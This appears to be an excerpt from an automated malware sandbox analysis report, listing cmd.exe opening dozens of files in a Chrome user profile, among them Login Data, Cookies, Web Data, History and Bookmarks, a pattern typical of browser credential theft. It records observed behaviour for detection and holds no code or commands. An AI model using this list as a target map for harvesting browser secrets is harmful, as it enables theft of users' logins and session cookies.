Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Shortcuts-journal | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\MANIFEST-000001 | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Reporting and NEL-journal | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\previews_opt_out.db | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\LOCK | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Google Profile.ico | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Last Tabs | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\MANIFEST-000002 | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\CURRENT | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\CURRENT | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\LOG | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\LOCK | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\c05775e9c4f00749_0 | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\MANIFEST-000001 | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000007 | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Current Session | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000009 | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000008 | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\67c62b86322c36fa_0 | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\78ce8e30f78a2d10_0 | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites-journal | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Trust Tokens | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\TransportSecurity | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\CURRENT | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000002 | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000005 | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir\the-real-index | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG.old | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000004 | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000001 | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Favicons-journal | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\33ffb3f3969344d8_0 | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00000b | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\MANIFEST-000001 | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\CURRENT | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\000003.log | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00000a | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\MANIFEST-000001 | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\000003.log | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\History | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Network Action Predictor | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\000003.log | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Current Tabs | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Media History-journal | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\000003.log | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\previews_opt_out.db-journal | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\33d102032f141cd7_0 | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Reporting and NEL | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Media History | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db-journal | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Last Session | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\CURRENT | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Bookmarks | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Network Persistent State | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOCK | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies-journal | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\LOCK | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\000003.log | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\1e3343c9662f5434_0 | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Favicons | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Shortcuts | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Trust Tokens-journal | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Network Action Predictor-journal | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\fee6704ec67d5ed1_0 | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\History-journal | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\LOG | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\data_1 | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\data_0 | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOCK | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\data_3 | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\History Provider Cache | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\data_2 | Jump to behavior |